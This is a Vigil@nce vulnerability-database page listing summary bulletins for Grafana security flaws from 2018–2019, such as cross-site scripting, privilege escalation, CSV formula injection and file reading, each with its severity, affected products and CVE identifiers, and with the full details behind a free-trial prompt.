The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Grafana

computer vulnerability bulletin 29478

Grafana: privilege escalation via CSV Formula Injection

Synthesis of the vulnerability

An attacker can bypass restrictions via CSV Formula Injection of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: user access/rights, data reading.
Provenance: document.
Creation date: 06/06/2019.
Identifiers: VIGILANCE-VUL-29478.

Description of the vulnerability

An attacker can bypass restrictions via CSV Formula Injection of Grafana, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2019-10909 CVE-2019-11358

jQuery, Symfony: Cross Site Scripting via templates

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via templates for Symfony, in order to run JavaScript code in the context of the web site.
Impacted products: Debian, Drupal Core, Fedora, Grafana, IBM API Connect, Joomla Extensions ~ not comprehensive, openSUSE Leap, Red Hat SSO, SLES, Symfony, Synology DSM, TYPO3 Core.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Number of vulnerabilities in this bulletin: 2.
Creation date: 18/04/2019.
Identifiers: CERTFR-2019-AVI-180, CVE-2019-10909, CVE-2019-11358, DLA-1777-1, DLA-1777-2, DLA-1778-1, DLA-1797-1, DRUPAL-SA-CORE-2019-005, DRUPAL-SA-CORE-2019-006, DSA-4434-1, DSA-4441-1, FEDORA-2019-2a7f472198, FEDORA-2019-32067d8b15, FEDORA-2019-3ee6a7adf2, FEDORA-2019-a3ca65028c, FEDORA-2019-f8db687840, ibm10882578, ibm10882596, ibm10882756, ibm10882762, ibm10882952, ibm10882956, openSUSE-SU-2019:1839-1, openSUSE-SU-2019:1872-1, RHSA-2019:1456-01, Synology-SA-19:19, TYPO3-CORE-SA-2019-009, TYPO3-CORE-SA-2019-010, TYPO3-CORE-SA-2019-011, TYPO3-CORE-SA-2019-012, TYPO3-CORE-SA-2019-013, TYPO3-PSA-2019-004, TYPO3-PSA-2019-005, TYPO3-PSA-2019-006, VIGILANCE-VUL-29070.

Description of the vulnerability

An attacker can trigger a Cross Site Scripting via templates for Symfony, in order to run JavaScript code in the context of the web site.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability bulletin 28688

Grafana: privilege escalation via Org-Admin/Alerting Pages

Synthesis of the vulnerability

An attacker can bypass restrictions via Org-Admin/Alerting Pages of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: privileged access/rights, data creation/edition.
Provenance: user account.
Creation date: 07/03/2019.
Identifiers: VIGILANCE-VUL-28688.

Description of the vulnerability

An attacker can bypass restrictions via Org-Admin/Alerting Pages of Grafana, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability note 27939

Grafana: code execution via go-macaroon

Synthesis of the vulnerability

An attacker can use a vulnerability via go-macaroon of Grafana, in order to run code.
Impacted products: Grafana.
Severity: 2/4.
Consequences: user access/rights.
Provenance: user shell.
Creation date: 03/12/2018.
Identifiers: 5469, VIGILANCE-VUL-27939.

Description of the vulnerability

An attacker can use a vulnerability via go-macaroon of Grafana, in order to run code.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2018-19039

Grafana: file reading via Text Panels

Synthesis of the vulnerability

A local attacker can read a file via Text Panels of Grafana, in order to obtain sensitive information.
Impacted products: Grafana.
Severity: 2/4.
Consequences: data reading.
Provenance: privileged account.
Creation date: 14/11/2018.
Identifiers: CVE-2018-19039, VIGILANCE-VUL-27790.

Description of the vulnerability

A local attacker can read a file via Text Panels of Grafana, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2018-1000816

Grafana: Cross Site Scripting via Query Editor

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via Query Editor of Grafana, in order to run JavaScript code in the context of the web site.
Impacted products: Grafana.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 24/10/2018.
Identifiers: 13667, CVE-2018-1000816, VIGILANCE-VUL-27610.

Description of the vulnerability

The Grafana product offers a web service.

However, it does not filter received data via Query Editor before inserting them in generated HTML documents.

An attacker can therefore trigger a Cross Site Scripting via Query Editor of Grafana, in order to run JavaScript code in the context of the web site.
Full Vigil@nce bulletin... (Free trial)

vulnerability note CVE-2018-15727

Grafana: privilege escalation via LDAP/OAuth

Synthesis of the vulnerability

An attacker can bypass restrictions via LDAP/OAuth of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 3/4.
Consequences: privileged access/rights, user access/rights.
Provenance: intranet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 29/08/2018.
Identifiers: CVE-2018-15727, CVE-2018-558213-REJECT, VIGILANCE-VUL-27104.

Description of the vulnerability

An attacker can bypass restrictions via LDAP/OAuth of Grafana, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

vulnerability announce 26592

Grafana: privilege escalation via Proxy IP Address

Synthesis of the vulnerability

An attacker can bypass restrictions via Proxy IP Address of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: data reading, data flow.
Provenance: internet client.
Creation date: 29/06/2018.
Identifiers: VIGILANCE-VUL-26592.

Description of the vulnerability

An attacker can bypass restrictions via Proxy IP Address of Grafana, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability 26455

Grafana: privilege escalation via API Keys Dashboard Overwrite

Synthesis of the vulnerability

An attacker can bypass restrictions via API Keys Dashboard Overwrite of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: data creation/edition, data deletion.
Provenance: user account.
Creation date: 19/06/2018.
Identifiers: 12343, VIGILANCE-VUL-26455.

Description of the vulnerability

An attacker can bypass restrictions via API Keys Dashboard Overwrite of Grafana, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

vulnerability note CVE-2018-12099

Grafana: Cross Site Scripting via Dashboard

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via Dashboard of Grafana, in order to run JavaScript code in the context of the web site.
Impacted products: Grafana.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 12/06/2018.
Identifiers: CVE-2018-12099, VIGILANCE-VUL-26374.

Description of the vulnerability

The Grafana product offers a web service.

However, it does not filter received data via Dashboard before inserting them in generated HTML documents.

An attacker can therefore trigger a Cross Site Scripting via Dashboard of Grafana, in order to run JavaScript code in the context of the web site.
Full Vigil@nce bulletin... (Free trial)
Our database contains other pages. You can request a free trial to read them.

Display information about Grafana: